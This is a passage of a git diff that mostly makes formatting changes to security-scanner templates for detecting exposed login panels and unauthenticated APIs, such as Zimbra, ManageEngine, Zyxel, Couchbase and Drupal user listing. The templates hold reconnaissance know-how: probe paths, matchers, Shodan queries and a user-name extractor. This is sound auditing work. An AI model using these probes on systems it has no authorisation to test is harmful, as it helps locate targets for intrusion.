b/http/exposed-panels/xeams-admin-console.yaml index 027ed9f989..aca816f37e 100644 --- a/http/exposed-panels/xeams-admin-console.yaml +++ b/http/exposed-panels/xeams-admin-console.yaml @@ -7,11 +7,11 @@ info: description: Xeams Admin Console login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.title:"Xeams Admin" tags: panel,xeams,admin,console @@ -22,6 +22,7 @@ http: - '{{BaseURL}}/FrontController' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/xenmobile-login.yaml b/http/exposed-panels/xenmobile-login.yaml index 2a48d99dd1..7ebb99e029 100644 --- a/http/exposed-panels/xenmobile-login.yaml +++ b/http/exposed-panels/xenmobile-login.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/6675 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,edb metadata: max-request: 1 + tags: panel,edb http: - method: GET @@ -25,6 +25,7 @@ http: - type: word words: - 'XenMobile - Console - Logon' + - type: status status: - 200 diff --git a/http/exposed-panels/xfinity-panel.yaml b/http/exposed-panels/xfinity-panel.yaml index 14e269b7cd..ac2459033a 100644 --- a/http/exposed-panels/xfinity-panel.yaml +++ b/http/exposed-panels/xfinity-panel.yaml @@ -7,11 +7,11 @@ info: description: Xfinity panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"xfinity" tags: panel,xfinity diff --git a/http/exposed-panels/xiaomi-wireless-router-login.yaml b/http/exposed-panels/xiaomi-wireless-router-login.yaml index 4da0b4b3a4..d9682beaf1 100644 --- a/http/exposed-panels/xiaomi-wireless-router-login.yaml +++ b/http/exposed-panels/xiaomi-wireless-router-login.yaml @@ -10,7 +10,7 @@ info: - https://www.mi.com/shop/search?keyword=%E8%B7%AF%E7%94%B1%E5%99%A8 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/xibocms-login.yaml b/http/exposed-panels/xibocms-login.yaml index af595ac551..d160c4d90c 100644 --- a/http/exposed-panels/xibocms-login.yaml +++ b/http/exposed-panels/xibocms-login.yaml @@ -7,11 +7,11 @@ info: description: Xibo CMS login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"/xibosignage/xibo-cms" tags: panel,xibocms diff --git a/http/exposed-panels/xnat-login.yaml b/http/exposed-panels/xnat-login.yaml index 171fb540bc..990183bc73 100644 --- a/http/exposed-panels/xnat-login.yaml +++ b/http/exposed-panels/xnat-login.yaml @@ -7,11 +7,11 @@ info: description: XNAT login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"xnat" tags: xnat,panel diff --git a/http/exposed-panels/xoops/xoops-installation-wizard.yaml b/http/exposed-panels/xoops/xoops-installation-wizard.yaml index 187c2d17bb..30c5fc1aa0 100644 --- a/http/exposed-panels/xoops/xoops-installation-wizard.yaml +++ b/http/exposed-panels/xoops/xoops-installation-wizard.yaml @@ -5,9 +5,9 @@ info: author: princechaddha severity: low description: XOOPS Installation Wizard panel was detected. - tags: panel,xoops metadata: max-request: 1 + tags: panel,xoops http: - method: GET diff --git a/http/exposed-panels/xvr-login.yaml b/http/exposed-panels/xvr-login.yaml index b8db23ca8a..07df8895f4 100644 --- a/http/exposed-panels/xvr-login.yaml +++ b/http/exposed-panels/xvr-login.yaml @@ -7,7 +7,7 @@ info: description: XVR login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/xweb500-panel.yaml b/http/exposed-panels/xweb500-panel.yaml index 08b06c6b4f..423d25487f 100644 --- a/http/exposed-panels/xweb500-panel.yaml +++ b/http/exposed-panels/xweb500-panel.yaml @@ -7,7 +7,7 @@ info: description: Xweb500 login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/xxljob-panel.yaml b/http/exposed-panels/xxljob-panel.yaml index 136bc32793..05a7baefaa 100644 --- a/http/exposed-panels/xxljob-panel.yaml +++ b/http/exposed-panels/xxljob-panel.yaml @@ -7,11 +7,11 @@ info: description: XXLJOB admin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.favicon.hash:1691956220 tags: panel,xxljob,login @@ -22,6 +22,7 @@ http: - "{{BaseURL}}/toLogin" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/yarn-manager-exposure.yaml b/http/exposed-panels/yarn-manager-exposure.yaml index 69ed67e149..28e1995e21 100644 --- a/http/exposed-panels/yarn-manager-exposure.yaml +++ b/http/exposed-panels/yarn-manager-exposure.yaml @@ -5,14 +5,15 @@ info: author: pdteam severity: low description: Apache YARN ResourceManager panel was detected. - tags: panel,apache,yarn,exposure metadata: max-request: 1 + tags: panel,apache,yarn,exposure http: - method: GET path: - '{{BaseURL}}/cluster/cluster' + matchers: - type: word words: diff --git a/http/exposed-panels/yellowfin-panel.yaml b/http/exposed-panels/yellowfin-panel.yaml index 7cc3391900..8f662cc1df 100644 --- a/http/exposed-panels/yellowfin-panel.yaml +++ b/http/exposed-panels/yellowfin-panel.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Yellowfin Information Collaboration" tags: yellowfin,panel,login @@ -17,6 +17,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/yopass-panel.yaml b/http/exposed-panels/yopass-panel.yaml index ad413491ee..98d4a7c914 100644 --- a/http/exposed-panels/yopass-panel.yaml +++ b/http/exposed-panels/yopass-panel.yaml @@ -7,7 +7,7 @@ info: description: Yopass panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/yzmcms-panel.yaml b/http/exposed-panels/yzmcms-panel.yaml index 366a899b6f..17b44e3361 100644 --- a/http/exposed-panels/yzmcms-panel.yaml +++ b/http/exposed-panels/yzmcms-panel.yaml @@ -7,7 +7,7 @@ info: description: YzmCMS login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/zabbix-server-login.yaml b/http/exposed-panels/zabbix-server-login.yaml index 1c02be05de..282c86b658 100644 --- a/http/exposed-panels/zabbix-server-login.yaml +++ b/http/exposed-panels/zabbix-server-login.yaml @@ -7,7 +7,7 @@ info: description: Zabbix login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -24,6 +24,7 @@ http: - type: word words: - "zabbix-server: Zabbix" + - type: status status: - 200 diff --git a/http/exposed-panels/zblog-exposed-admin-panel.yaml b/http/exposed-panels/zblog-exposed-admin-panel.yaml index db4a6b3af0..cb9c86fc53 100644 --- a/http/exposed-panels/zblog-exposed-admin-panel.yaml +++ b/http/exposed-panels/zblog-exposed-admin-panel.yaml @@ -9,11 +9,11 @@ info: - https://github.com/zblogcn/zblogphp classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:zblog tags: zblog,panel diff --git a/http/exposed-panels/zblogphp-panel.yaml b/http/exposed-panels/zblogphp-panel.yaml index a27a2344f3..249bd0d363 100644 --- a/http/exposed-panels/zblogphp-panel.yaml +++ b/http/exposed-panels/zblogphp-panel.yaml @@ -7,7 +7,7 @@ info: description: Z-BlogPHP panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/zenario-login-panel.yaml b/http/exposed-panels/zenario-login-panel.yaml index 2af18a7777..3350fe644d 100644 --- a/http/exposed-panels/zenario-login-panel.yaml +++ b/http/exposed-panels/zenario-login-panel.yaml @@ -7,11 +7,11 @@ info: description: Zenario admin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,zenario metadata: max-request: 1 + tags: panel,zenario http: - method: GET diff --git a/http/exposed-panels/zentao-detect.yaml b/http/exposed-panels/zentao-detect.yaml index 1d794f465e..db977ca8e8 100644 --- a/http/exposed-panels/zentao-detect.yaml +++ b/http/exposed-panels/zentao-detect.yaml @@ -7,16 +7,17 @@ info: description: Zentao panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel metadata: max-request: 1 + tags: panel http: - method: GET path: - "{{BaseURL}}/zentao/index.php?mode=getconfig" + matchers: - type: word words: diff --git a/http/exposed-panels/zentral-panel.yaml b/http/exposed-panels/zentral-panel.yaml index c51a2fc039..e0660a8c6c 100644 --- a/http/exposed-panels/zentral-panel.yaml +++ b/http/exposed-panels/zentral-panel.yaml @@ -5,16 +5,16 @@ info: author: Adam Crosser severity: info description: Zentral panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 reference: - https://github.com/zentralopensource/zentral - https://zentral.io - tags: panel,zentral,oss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: max-request: 1 + tags: panel,zentral,oss http: - method: GET diff --git a/http/exposed-panels/zeroshell-login.yaml b/http/exposed-panels/zeroshell-login.yaml index 34519e492b..b6154fa10b 100644 --- a/http/exposed-panels/zeroshell-login.yaml +++ b/http/exposed-panels/zeroshell-login.yaml @@ -7,7 +7,7 @@ info: description: ZeroShell panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/zimbra-web-client.yaml b/http/exposed-panels/zimbra-web-client.yaml index ae2e49d50d..4146c1b8f7 100644 --- a/http/exposed-panels/zimbra-web-client.yaml +++ b/http/exposed-panels/zimbra-web-client.yaml @@ -5,16 +5,16 @@ info: author: dhiyaneshDk,idealphase severity: info description: Zimbra panel was detected. Zimbra provides open source server and client software for messaging and collaboration. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 reference: - https://www.exploit-db.com/ghdb/7409 - https://www.zimbra.com/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Zimbra Web Client Sign In" tags: edb,panel,zimbra diff --git a/http/exposed-panels/zimbra-web-login.yaml b/http/exposed-panels/zimbra-web-login.yaml index 1f02e46b2c..6f819ae30c 100644 --- a/http/exposed-panels/zimbra-web-login.yaml +++ b/http/exposed-panels/zimbra-web-login.yaml @@ -6,15 +6,15 @@ info: severity: info description: | Zimbra Collaboration Suite panel was detected. Zimbra Collaboration Suite simplifies the communication environment, connects people over multiple channels, and provides a single place to manage collaboration and communication. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 reference: - https://www.zimbra.com/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Zimbra Collaboration Suite" tags: panel,zimbra @@ -25,6 +25,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/zipkin-exposure.yaml b/http/exposed-panels/zipkin-exposure.yaml index 273ae5cbb6..bb0ca868c7 100644 --- a/http/exposed-panels/zipkin-exposure.yaml +++ b/http/exposed-panels/zipkin-exposure.yaml @@ -7,11 +7,11 @@ info: description: Zipkin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: html:"webpackJsonpzipkin-lens" tags: panel,zipkin @@ -20,6 +20,7 @@ http: path: - "{{BaseURL}}" - "{{BaseURL}}/zipkin/" + matchers: - type: word part: body diff --git a/http/exposed-panels/zoho/manageengine-adaudit.yaml b/http/exposed-panels/zoho/manageengine-adaudit.yaml index b59cad009c..c4e4a1bc57 100644 --- a/http/exposed-panels/zoho/manageengine-adaudit.yaml +++ b/http/exposed-panels/zoho/manageengine-adaudit.yaml @@ -6,16 +6,16 @@ info: severity: info description: | ZOHO ManageEngine ADAudit/ADManager panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 reference: - https://www.manageengine.com/products/active-directory-audit/ - https://www.manageengine.com/products/ad-manager/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.title:"ADAudit Plus" || http.title:"ManageEngine - ADManager Plus" tags: panel,zoho,manageengine @@ -26,6 +26,7 @@ http: - "{{BaseURL}}/authorization.do" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/zoho/manageengine-adselfservice.yaml b/http/exposed-panels/zoho/manageengine-adselfservice.yaml index 3569773366..d7343abbaa 100644 --- a/http/exposed-panels/zoho/manageengine-adselfservice.yaml +++ b/http/exposed-panels/zoho/manageengine-adselfservice.yaml @@ -7,11 +7,11 @@ info: description: ZOHO ManageEngine ADSelfService panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.title:"ADSelfService Plus" tags: panel,zoho,manageengine diff --git a/http/exposed-panels/zoho/manageengine-analytics.yaml b/http/exposed-panels/zoho/manageengine-analytics.yaml index 9e98b0d112..2cce1d891a 100644 --- a/http/exposed-panels/zoho/manageengine-analytics.yaml +++ b/http/exposed-panels/zoho/manageengine-analytics.yaml @@ -7,7 +7,7 @@ info: description: ZOHO ManageEngine analytics plus panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/zoho/manageengine-apex-helpdesk.yaml b/http/exposed-panels/zoho/manageengine-apex-helpdesk.yaml index d884435b3c..a8499c33b7 100644 --- a/http/exposed-panels/zoho/manageengine-apex-helpdesk.yaml +++ b/http/exposed-panels/zoho/manageengine-apex-helpdesk.yaml @@ -7,7 +7,7 @@ info: description: ZOHO MangageEngine APEX panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/zoho/manageengine-applications-manager.yaml b/http/exposed-panels/zoho/manageengine-applications-manager.yaml index d5635f52d2..2c0fa2f6b0 100644 --- a/http/exposed-panels/zoho/manageengine-applications-manager.yaml +++ b/http/exposed-panels/zoho/manageengine-applications-manager.yaml @@ -7,11 +7,11 @@ info: description: ZOHO ManageEngine panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,zoho,manageengine metadata: max-request: 1 + tags: panel,zoho,manageengine http: - method: GET diff --git a/http/exposed-panels/zoho/manageengine-assetexplorer.yaml b/http/exposed-panels/zoho/manageengine-assetexplorer.yaml index f93f679443..6b042edece 100644 --- a/http/exposed-panels/zoho/manageengine-assetexplorer.yaml +++ b/http/exposed-panels/zoho/manageengine-assetexplorer.yaml @@ -7,7 +7,7 @@ info: description: ZOHO ManageEngine AssetExplorer panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/zoho/manageengine-desktop.yaml b/http/exposed-panels/zoho/manageengine-desktop.yaml index 27793c03c5..f9e8ba9e3d 100644 --- a/http/exposed-panels/zoho/manageengine-desktop.yaml +++ b/http/exposed-panels/zoho/manageengine-desktop.yaml @@ -7,7 +7,7 @@ info: description: ZOHO ManageEngine desktop panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/zoho/manageengine-keymanagerplus.yaml b/http/exposed-panels/zoho/manageengine-keymanagerplus.yaml index 884b4e7fdd..1fb05c41b2 100644 --- a/http/exposed-panels/zoho/manageengine-keymanagerplus.yaml +++ b/http/exposed-panels/zoho/manageengine-keymanagerplus.yaml @@ -5,15 +5,15 @@ info: author: righettod severity: info description: ZOHO ManageEngine KeyManagerPlus panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 reference: - https://www.manageengine.com/key-manager/ - tags: panel,zoho,manageengine + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: max-request: 2 + tags: panel,zoho,manageengine http: - method: GET @@ -22,9 +22,9 @@ http: - '{{BaseURL}}/pki/images/keyManager_title.ico' stop-at-first-match: true + matchers-condition: or matchers: - - type: dsl dsl: - "status_code==200" diff --git a/http/exposed-panels/zoho/manageengine-network-config.yaml b/http/exposed-panels/zoho/manageengine-network-config.yaml index 8f91c75529..528a68b796 100644 --- a/http/exposed-panels/zoho/manageengine-network-config.yaml +++ b/http/exposed-panels/zoho/manageengine-network-config.yaml @@ -7,11 +7,11 @@ info: description: ZOHO ManageEngine Network Configuration Manager was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Network Configuration Manager" tags: panel,zoho,manageengine diff --git a/http/exposed-panels/zoho/manageengine-opmanager.yaml b/http/exposed-panels/zoho/manageengine-opmanager.yaml index 729263840e..e67a5fd5ae 100644 --- a/http/exposed-panels/zoho/manageengine-opmanager.yaml +++ b/http/exposed-panels/zoho/manageengine-opmanager.yaml @@ -5,12 +5,12 @@ info: author: dhiyaneshDK,daffainfo severity: info description: ZOHO ManageEngine OpManager panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 reference: - https://www.manageengine.com/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: max-request: 1 shodan-query: http.title:"OpManager Plus" diff --git a/http/exposed-panels/zoho/manageengine-servicedesk.yaml b/http/exposed-panels/zoho/manageengine-servicedesk.yaml index f45d0c6058..0a9525f6cd 100644 --- a/http/exposed-panels/zoho/manageengine-servicedesk.yaml +++ b/http/exposed-panels/zoho/manageengine-servicedesk.yaml @@ -7,7 +7,7 @@ info: description: ZOHO ManageEngine ServiceDesk panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/zoho/manageengine-supportcenter.yaml b/http/exposed-panels/zoho/manageengine-supportcenter.yaml index 88a9c65831..704cc6eae9 100644 --- a/http/exposed-panels/zoho/manageengine-supportcenter.yaml +++ b/http/exposed-panels/zoho/manageengine-supportcenter.yaml @@ -7,7 +7,7 @@ info: description: ZOHO ManageEngine SupportCenter panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/zoneminder-login.yaml b/http/exposed-panels/zoneminder-login.yaml index a64a91324d..7e17c83f17 100644 --- a/http/exposed-panels/zoneminder-login.yaml +++ b/http/exposed-panels/zoneminder-login.yaml @@ -7,11 +7,11 @@ info: description: ZoneMinder panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,zoneminder metadata: max-request: 1 + tags: panel,zoneminder http: - method: GET @@ -20,6 +20,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/zte-panel.yaml b/http/exposed-panels/zte-panel.yaml index f86b668bd6..4978d2e1a3 100644 --- a/http/exposed-panels/zte-panel.yaml +++ b/http/exposed-panels/zte-panel.yaml @@ -6,15 +6,15 @@ info: severity: info description: | ZTE panel was detected. ZTE Corporation is a global leader in telecommunications and information technology. Founded in 1985 and listed on both the Hong Kong and Shenzhen Stock Exchanges, the company has been committed to providing innovative technologies and integrated solutions for global operators, government and enterprise, and consumers from over 160 countries across the globe. ZTE Corporation is a global leader in telecommunications and information technology. Founded in 1985 and listed on both the Hong Kong and Shenzhen Stock Exchanges, the company has been committed to providing innovative technologies and integrated solutions for global operators, government and enterprise, and consumers from over 160 countries across the globe. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 reference: - https://www.zte.com.cn/global/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"ZTE Corporation" tags: panel,zte diff --git a/http/exposed-panels/zuul-panel.yaml b/http/exposed-panels/zuul-panel.yaml index fcc8b87e7f..c000279786 100644 --- a/http/exposed-panels/zuul-panel.yaml +++ b/http/exposed-panels/zuul-panel.yaml @@ -5,12 +5,12 @@ info: author: Yuzhe-zhang-0 severity: info description: ZUUL panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 reference: - https://opendev.org/zuul/zuul + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: max-request: 2 shodan-query: http.favicon.hash:-1127895693 @@ -25,6 +25,7 @@ http: host-redirects: true max-redirects: 2 stop-at-first-match: true + matchers-condition: or matchers: - type: word diff --git a/http/exposed-panels/zyxel-router-panel.yaml b/http/exposed-panels/zyxel-router-panel.yaml index e6233f94b2..400ae7b939 100644 --- a/http/exposed-panels/zyxel-router-panel.yaml +++ b/http/exposed-panels/zyxel-router-panel.yaml @@ -7,11 +7,11 @@ info: description: ZyXel Router login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: 'title:"Web-Based Configurator" html:"zyxel"' tags: panel,zyxel,router,iot @@ -22,6 +22,7 @@ http: - "{{BaseURL}}/login" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/zyxel/zyxel-firewall-panel.yaml b/http/exposed-panels/zyxel/zyxel-firewall-panel.yaml index 9fb1a9f5ac..a8eafb8e91 100644 --- a/http/exposed-panels/zyxel/zyxel-firewall-panel.yaml +++ b/http/exposed-panels/zyxel/zyxel-firewall-panel.yaml @@ -7,11 +7,11 @@ info: description: Zyxel Firewall panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:-440644339 tags: panel,xyxel,firewall diff --git a/http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml b/http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml index b4cf52424d..46333fd1b4 100644 --- a/http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml +++ b/http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml @@ -5,8 +5,8 @@ info: author: princechaddha severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"VMG1312-B10D" tags: tech,zyxel,modem,router,panel diff --git a/http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml b/http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml index 96b9b99c8e..aa95f6eb40 100644 --- a/http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml +++ b/http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml @@ -5,8 +5,8 @@ info: author: princechaddha severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"VSG1432-B101" tags: tech,zyxel,modem,router,panel diff --git a/http/exposures/apis/couchbase-buckets-api.yaml b/http/exposures/apis/couchbase-buckets-api.yaml index a92cf0ac53..0e9f12894c 100644 --- a/http/exposures/apis/couchbase-buckets-api.yaml +++ b/http/exposures/apis/couchbase-buckets-api.yaml @@ -5,16 +5,16 @@ info: author: geeknik severity: medium description: Couchbase Buckets REST API without authentication was detected. + reference: + - https://docs.couchbase.com/server/current/rest-api/rest-bucket-intro.html + - https://www.elastic.co/guide/en/beats/metricbeat/current/metricbeat-metricset-couchbase-bucket.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - reference: - - https://docs.couchbase.com/server/current/rest-api/rest-bucket-intro.html - - https://www.elastic.co/guide/en/beats/metricbeat/current/metricbeat-metricset-couchbase-bucket.html - tags: exposure,couchbase metadata: max-request: 1 + tags: exposure,couchbase http: - method: GET diff --git a/http/exposures/apis/drupal-jsonapi-user-listing.yaml b/http/exposures/apis/drupal-jsonapi-user-listing.yaml index e3ad4cad96..0fe75f47a0 100644 --- a/http/exposures/apis/drupal-jsonapi-user-listing.yaml +++ b/http/exposures/apis/drupal-jsonapi-user-listing.yaml @@ -12,8 +12,8 @@ info: cvss-score: 5.3 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.component:"drupal" tags: drupal,exposure @@ -35,4 +35,4 @@ http: extractors: - type: json json: - - '.data[].attributes.display_name' \ No newline at end of file + - '.data[].attributes.display_name' diff --git a/http/exposures/apis/jeecg-boot-swagger.yaml b/http/exposures/apis/jeecg-boot-swagger.yaml index 446731b0b8..f7220fee1f 100644 --- 